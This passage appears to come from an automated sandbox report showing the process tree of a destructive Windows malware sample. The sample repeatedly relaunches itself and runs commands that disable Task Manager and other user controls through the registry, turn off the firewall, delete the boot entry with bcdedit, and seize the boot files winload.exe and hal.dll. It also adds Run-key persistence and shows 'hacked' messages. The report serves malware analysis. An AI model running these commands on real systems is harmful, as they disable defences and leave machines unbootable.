        explorer.exe
        7⤵
        
        PID:9096
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:9104
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:5680
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:7232
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:9292
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\354F.tmp\3550.tmp\3551.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:9480
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:9416
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:9656
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:9824
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:10032
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10272
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10880
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:11400
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:12248
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10832
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        7⤵
        Modifies Windows Firewall
        
        PID:12760
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:5632
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5764
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5832
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:5912
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:5552
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2E00.tmp\2E01.tmp\2E02.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:6168
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:7684
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        
        PID:7260
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8120
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:7652
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:7976
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7400
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:5340
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:8080
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        
        PID:2128
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3484
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:2900
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:2136
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:996
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:3676
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:4432
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:1796
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:2288
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9496
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9712
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9904
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:10104
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:5896
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7052
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9360
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:10212
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:10392
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:10576
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:11132
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\83EC.tmp\83ED.tmp\83EE.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:11276
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:5752
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:11444
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:11652
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:11948
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:8460
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C3C4.tmp\C3C4.tmp\C3D5.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:12336
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:11588
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:12416
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:12676
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:13080
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:11688
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3732
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:6368
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:6460
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:6564
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:6956
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\49A6.tmp\49A7.tmp\49A8.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:7140
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:2868
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Modifies file permissions
        
        PID:7096
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:7648
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6480
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:6548
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:5140
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4972
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:2796
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8052
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7656
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:1464
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:4448
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:2696
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:3572
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:4820
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:7628
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:4432
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:10156
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9728
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8060
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7224
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:10260
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:10412
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:10600
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:10868
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:11080
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:5504
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:11672
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9D9E.tmp\9D9F.tmp\9DA0.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:12184
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:11936
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:12272
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:9852
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:7792
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:12716
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DD66.tmp\DD67.tmp\DD68.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:13272
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:13108
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:9416
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:10400
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:10748
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:7068
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:6492
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5784
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:680
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:6252
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:7480
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:7736
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:7976
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:6940
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        5⤵
        Modifies Windows Firewall
        
        PID:6684
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /delete {current}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:3312
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:6740
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:5468
    - - C:\Windows\system32\msg.exe
        
        msg * Has sido hackeado!
        5⤵
        
        PID:7664
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\drivers" /r
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7728
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:3560
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:2284
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:4156
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    PID:1932
- - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
    C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
    3⤵
    PID:1364
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C11D.tmp\C11E.tmp\C11F.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
      4⤵
      PID:540
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:2752
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:832
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        
        PID:4808
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        
        PID:4000
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        Views/modifies file attributes
        
        PID:1736
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        
        PID:4020
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2644
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        Views/modifies file attributes
        
        PID:3560
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        Possible privilege escalation attempt
        
        PID:4620
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        
        PID:1416
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        Views/modifies file attributes
        
        PID:944
    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:1116
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:1092
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:628
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:1852
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        
        PID:4928
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Views/modifies file attributes
        
        PID:5156
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:2468
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:6060
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:6412
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:6420
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:6276
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:6656
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:6632
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:6248
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:7016
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:7076
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:7188
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\684A.tmp\684B.tmp\684C.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:7304
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:7116
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Modifies file permissions
        
        PID:4404
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:4432
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6540
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:896
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7396
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1640
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:7524
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Modifies file permissions
        
        PID:2128
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:6080
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:2920
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:5072
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:6740
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:1508
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:2900
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:8416
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:8708
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:11852
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:12216
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8096
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6296
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:4508
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6028
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:12296
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:12576
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:12980
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:5616
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:1640
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F860.tmp\F861.tmp\F862.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:13356
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:11928
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:7272
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:7384
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:7500
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:7580
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:7848
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7990.tmp\7991.tmp\7992.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:8064
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:7300
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7664
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Modifies file permissions
        
        PID:1196
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:2136
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:7716
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:7012
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:6080
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:4812
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Modifies file permissions
        
        PID:3572
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:1480
        
